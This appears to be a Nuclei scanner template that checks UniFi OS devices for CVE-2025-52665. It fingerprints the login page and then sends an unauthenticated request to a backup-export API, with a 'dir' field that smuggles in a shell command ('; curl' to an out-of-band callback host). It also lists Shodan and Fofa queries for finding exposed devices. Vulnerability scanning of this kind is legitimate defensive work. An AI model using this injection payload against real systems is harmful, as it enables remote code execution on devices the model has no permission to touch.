id: CVE-2025-52665

info:
  name: UniFi Access - Broken Access Control
  author: theamanrawat,DhiyaneshDK
  severity: critical
  description: |
    UniFi Access Application 3.3.22 through 3.4.31 contains a broken authentication caused by misconfiguration exposing management API without proper authentication, letting attackers on management network access management functions, exploit requires network access.
  impact: |
    Attackers on the management network can access management APIs without authentication, potentially leading to unauthorized control of the system.
  remediation: |
    Update to version 4.0.21 or later.
  reference:
    - https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191
    - https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
    - https://nvd.nist.gov/vuln/detail/CVE-2025-52665
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-52665
    epss-score: 0.26604
    epss-percentile: 0.96432
    cwe-id: CWE-306
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.html:"UniFi OS"
    fofa-query: body="UniFi OS"
  tags: cve,cve2025,unifi,rce,vuln,vkev

flow: http(1) && http(2)

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "UniFi OS","UniFi Dream Machine SE")'
        condition: and
        internal: true

  - raw:
      - |
        @Host: {{Host}}:9780
        POST /api/ucore/backup/export HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "dir":"/tmp/{{rand_string}}-; curl http://{{interactsh-url}}/; #"
        }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a004730450220211f9e6d2fb9c907e79dd4fff070e4c8b666d753fffeb50c0d700ebc6d6b9e4e0221008b01e0f4ffa2cf230fb8f06c17e42fb9e969a06901e4fb473768dd9497c34e9c:922c64590222798bb761d5b6d8e72950